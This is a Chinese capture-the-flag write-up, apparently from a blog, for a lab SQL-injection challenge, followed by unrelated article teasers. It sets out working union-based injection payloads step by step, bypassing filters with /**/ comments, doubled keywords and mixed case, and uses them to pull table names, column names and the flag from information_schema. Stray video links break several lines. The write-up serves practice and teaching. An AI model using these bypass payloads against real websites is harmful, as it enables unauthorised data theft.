技术心得:实验室每日一题WP

简介: 技术心得:实验室每日一题WP

"

打开题目,直接受到物理攻击。看到网页左下角提示

于是尝试sql注入,/?id=1;得到回显,/?id=//代码效果参考:https://v.youku.com/v_show/id_XNjQwNjgyMTc5Ng==.html

1' ;无回显,判断为数//代码效果参考: https://v.youku.com/v_show/id_XNjQwMDM2Mzg2MA==.html

字型注入。

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

尝试查询字段数,经尝试过滤了空格 or ,于是用/**/代替空格 和双写绕过。

?id=1//oorderrder//by/**/1得到回显

测试为3个字段数,然后查询回显,发现select和union被过滤,发现双写绕过不行,于是尝试大小写绕过

?id=1//Union//Select/**/1,2,3

发现2,3为回显位,于是查询当前数据库名。

?id=1//Union//Select/**/1,2,database()

得到数据库名 text

查询表名

?id=1//Union//Select//1,2,group_concat(table_name)//frfromom//information_schema.tables//where/**/table_schema='text'

得到flag,users

获取列名

?id=1//uNion//Select//1,2,group_concat(column_name)//frfromom//information_schema.columns//where/**/table_name=%27flag%27

id,flag

查询字段值

?id=1//uNion//Select//1,2,flag//frfromom/**/flag

得到flag

flag{You have successfully!!!}

下次可以尝试直接爆破数据库密码了


"
image.png
相关文章
如何初始化PoolingHttpClientConnectionManager
【8月更文挑战第26天】如何初始化PoolingHttpClientConnectionManager
707 7
|
移动开发 网络协议 物联网
STM32+果云GA6-GPRS/GSM模块+MQTT+HTTP协议连接中移OneNet上传GPS数据定位
STM32+果云GA6-GPRS/GSM模块+MQTT+HTTP协议连接中移OneNet上传GPS数据定位
1334 0
STM32+果云GA6-GPRS/GSM模块+MQTT+HTTP协议连接中移OneNet上传GPS数据定位
|
监控 Oracle 关系型数据库
"深度剖析:Oracle SGA大小调整策略——从组件解析到动态优化,打造高效数据库性能"
【8月更文挑战第9天】在Oracle数据库性能优化中,系统全局区(SGA)的大小调整至关重要。SGA作为一组共享内存区域,直接影响数据库处理能力和响应速度。本文通过问答形式介绍SGA调整策略:包括SGA的组成(如数据缓冲区、共享池等),如何根据负载与物理内存确定初始大小,手动调整SGA的方法(如使用`ALTER SYSTEM`命令),以及利用自动内存管理(AMM)特性实现智能调整。调整过程中需注意监控与测试,确保稳定性和性能。
1217 2
|
网络协议 算法 网络性能优化
TCP协议基础
【8月更文挑战第18天】
348 3
灭霸打个响指的功夫,看懂Verilog多维数组【Verilog高级教程】
灭霸打个响指的功夫,看懂Verilog多维数组【Verilog高级教程】
灭霸打个响指的功夫,看懂Verilog多维数组【Verilog高级教程】
|
监控 Linux 数据中心
|
Java 开发者
综合案例:文件批量更名|学习笔记
快速学习 综合案例:文件批量更名
250 0
综合案例:文件批量更名|学习笔记
|
7天前
|
人工智能 自然语言处理 JavaScript
2026年Windows+Ollama本地部署OpenClaw保姆级教程:本地AI Agent+阿里云上快速搭建
2026年OpenClaw凭借本地部署、私有化运行的特性,成为打造个人智能体的核心工具,而Ollama作为轻量级本地大模型管理工具,能让OpenClaw摆脱对云端大模型的依赖,实现**本地推理、数据不泄露、全流程私有化**的智能体验。本文基于Windows 11系统,从硬件环境准备、Ollama安装与模型定制、OpenClaw部署配置、技能扩展到常见问题排查,打造保姆级本地部署教程,同时补充阿里云OpenClaw(Clawdbot)快速部署步骤,兼顾本地私有化需求与云端7×24小时运行需求,文中所有代码命令均可直接复制执行,确保零基础用户也能快速搭建属于自己的本地智能体。
8709 71